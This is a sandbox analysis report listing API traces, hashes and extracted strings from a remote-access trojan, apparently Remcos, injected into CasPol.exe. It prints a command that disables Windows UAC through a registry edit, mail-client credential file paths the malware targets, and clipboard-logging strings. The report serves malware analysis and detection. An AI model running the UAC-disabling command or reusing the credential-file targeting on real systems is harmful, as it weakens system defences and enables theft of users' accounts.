                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                              • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                                                                              • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                                                                              • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                                                                              • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                                                                              APIs
                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Enum$InfoQueryValue
                                                                                                                                                              • String ID: [regsplt]$DG
                                                                                                                                                              • API String ID: 3554306468-1089238109
                                                                                                                                                              • Opcode ID: b1c827c768f8b89385a9e252993ed6dfc40810504ddb71ef3f257848589216b9
                                                                                                                                                              • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                                                                              • Opcode Fuzzy Hash: b1c827c768f8b89385a9e252993ed6dfc40810504ddb71ef3f257848589216b9
                                                                                                                                                              • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                                                                                                              • _free.LIBCMT ref: 004427DF
                                                                                                                                                              • _free.LIBCMT ref: 004427E9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                              • String ID: 87b$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                              • API String ID: 2506810119-3750061527
                                                                                                                                                              • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                                                                              • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                                                                              • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                                                                              • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                              • API String ID: 4036392271-1520055953
                                                                                                                                                              • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                              • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                              • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                              • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                                                                              • API String ID: 2974294136-753205382
                                                                                                                                                              • Opcode ID: c45f1c20ab592c1ac194ba1baf481a8095d28be8187a03407ed9f83d84f8ae17
                                                                                                                                                              • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                                                                              • Opcode Fuzzy Hash: c45f1c20ab592c1ac194ba1baf481a8095d28be8187a03407ed9f83d84f8ae17
                                                                                                                                                              • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                                                                              APIs
                                                                                                                                                              • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                              • String ID: 0$MsgWindowClass
                                                                                                                                                              • API String ID: 2877667751-2410386613
                                                                                                                                                              • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                                              • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                                                                              • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                                              • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$CreateProcess
                                                                                                                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                              • API String ID: 2922976086-4183131282
                                                                                                                                                              • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                              • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                                                                              • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                              • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                              • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                              • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                                                                              • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                              • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                              • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                              • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                              • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                              • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                              APIs
                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                                                              • SetEvent.KERNEL32(000002DC), ref: 00404AF9
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                              • String ID: KeepAlive | Disabled
                                                                                                                                                              • API String ID: 2993684571-305739064
                                                                                                                                                              • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                                                                              • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                                                                              • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                                                                              • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                              • String ID: Alarm triggered
                                                                                                                                                              • API String ID: 614609389-2816303416
                                                                                                                                                              • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                                                                              • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                                                                              • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                                                                              • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                                                                              APIs
                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                                                                              Strings
                                                                                                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                              • API String ID: 3024135584-2418719853
                                                                                                                                                              • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                                              • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                                                              • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                                              • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                                                                              • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                                                                              • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                                                                              • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                                                                • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                                                                                • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2180151492-0
                                                                                                                                                              • Opcode ID: 38b7cc1bcac48a295481161db252efa9018639b129d0edbffe131367ad8f1267
                                                                                                                                                              • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                                                                              • Opcode Fuzzy Hash: 38b7cc1bcac48a295481161db252efa9018639b129d0edbffe131367ad8f1267
                                                                                                                                                              • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                              • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                              • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                                                                              • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                              • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                                                                                              • __freea.LIBCMT ref: 0044FFC4
                                                                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 313313983-0
